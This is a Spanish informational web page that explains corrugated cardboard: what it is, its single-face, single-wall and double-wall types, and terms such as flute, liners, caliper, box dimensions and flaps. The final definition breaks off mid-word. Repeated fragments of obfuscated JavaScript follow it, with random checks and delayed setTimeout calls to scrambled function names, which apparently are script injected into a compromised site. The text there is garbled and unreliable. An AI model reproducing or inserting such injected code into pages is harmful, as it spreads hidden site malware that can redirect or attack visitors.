Cartón Corrugado. ¿Qué es Cartón Corrugado?

El cartón corrugado es una estructura formada por un nervio central de papel ondulado (papel onda), reforzado externamente por dos capas de papel (papeles liners o tapas) pegadas con adhesivo en las crestas de la onda. Es un material liviano, cuya resistencia se basa en el trabajo conjunto y vertical de estas tres láminas de papel. Para obtener su mayor resistencia, la onda del cartón corrugado tiene que trabajar en forma vertical. Se puede hacer una analogía entre las columnas que forma el cartón corrugado y las columnas de una construcción.

Tipos de Cartón Corrugado

Dentro de la gran variedad de posibilidades que el cartón corrugado ofrece, podemos distinguir principalmente los siguientes tipos:

• Cartón sencillo (Single Face) . Es una estructura flexible formada por un elemento ondulado (onda) pegado a un elemento plano (liner).

• Cartón simple (Single Wall). Es una estructura rígida formada por un elemento ondulado (onda) pegado en ambos lados a elementos planos (liners).

• Cartón doble (Double Wall). Es una estructura rígida formada por tres elementos planos (liners) pegados a dos elementos ondulados (ondas) intercalados.

cartoncorrok

  • + -

    Cartón

    envases imp.27El cartón corrugado es una estructura formada por un nervio central de papel ondulado (papel onda), reforzado externamente por dos capas de papel (papeles liners o tapas) pegadas con adhesivo en las crestas de la onda. Es un material liviano, cuya resistencia se basa en el trabajo conjunto y vertical de estas tres láminas de papel. Para obtener su mayor resistencia, la onda del cartón corrugado tiene que trabajar en forma vertical. Se puede hacer una analogía entre las columnas que forma el cartón corrugado y las columnas de una construcción.

    El cartón corrugado pierde su resistencia si la onda sufre aplastamientos o quebraduras producidos por fuerzas externas.

  • + -

    Tipos

    Dentro de la gran variedad de posibilidades que el cartón corrugado ofrece, podemos distinguir principalmente los siguientes tipos:

    • - Cartón sencillo (Single Face) . Es una estructura flexible formada por un elemento ondulado (onda) pegado a un elemento plano (liner).
    • - Cartón simple (Single Wall). Es una estructura rígida formada por un elemento ondulado (onda) pegado en ambos lados a elementos planos (liners).
    • - Cartón doble (Double Wall). Es una estructura rígida formada por tres elementos planos (liners) pegados a dos elementos ondulados (ondas) intercalados.

  • + -

    Elementos

    buin 048Onda

    Es la configuración geométrica dada a un papel en una máquina corrugadora, para un posterior pegado a elementos planos. Podemos diferenciar tres tipos de onda:

    E (microcorrugado) Onda de menor tamaño que la B, que se caracteriza porque permite lograr una mejor impresión.

    Papel Onda

    Es el elemento que formará la ondulación entre las dos tapas. Por extensión se denomina “papel onda” al material usado con este fin.

    Liners (Tapas)

    Es el o los elementos planos del cartón corrugado. Por extensión se llama también “papel tapa” al utilizado para esta finalidad.

    Plancha (Hoja Madre)

    Es una hoja de cartón corrugado, plana, definida por sus medidas de ancho y largo. El ancho será siempre paralelo a la onda.

    Espesor de plancha (Calibre) Es la medida entre las dos tapas externas de una plancha de cartón corrugado. Se expresa siempre en milímetros.

    Caja de cartón corrugado

    Embalaje rígido formado por una o más planchas de cartón corrugado, unidas o solamente cortadas, para permitir los dobleces que formarán las caras.

    Dimensiones de la caja

    Referidas a las dimensiones internas –que más adelante se definen-, siempre medidas en milímetros, en orden largo x ancho x alto.

    Dimensiones internas

    Dimensiones limitadas por las caras internas de una caja.

    R.Alto11-08_014Dimensiones útiles

    Dimensiones referidas al espacio ocupado por el contenido.

    Paredes

    Cualquier cara de una caja, excepto la tapa o el fondo. Las dos paredes de área mayor se llaman laterales y las dos de área menor se llaman cabezales.

    Gualetas

    Partes de la caja que se doblan para formar las caras correspondientes a la tapa y el fondo. Las gualetas de los cabezales, por doblarse primero, se llaman internas; las gualetas de los laterales, por doblarse sobre las gualetas de los cabezales, se llaman gualetas externas.

    Normalmente las gualetas externas se fabrican de tope.

    Lengüeta

    Extensión, de corte especial, en una o dos paredes extremas de la caja, para ser pegada o cosida (corcheteada) a la otra pared extrema, formandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}